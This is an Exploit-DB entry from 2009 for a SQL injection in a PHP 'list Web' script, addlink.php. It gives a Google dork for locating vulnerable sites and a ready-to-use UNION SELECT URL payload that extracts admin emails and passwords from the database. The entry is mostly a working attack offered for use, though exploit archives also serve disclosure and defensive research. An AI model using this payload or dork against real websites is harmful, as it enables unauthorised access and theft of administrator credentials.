list Web - 'addlink.php?id' SQL Injection

EDB-ID:

10838

CVE:

N/A


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2009-12-31


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

|
|  list Web  (addlink.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://maker.ir
|
| DorK   : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|

Exploit:
________


www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--

IQ-SecuritY FoRuM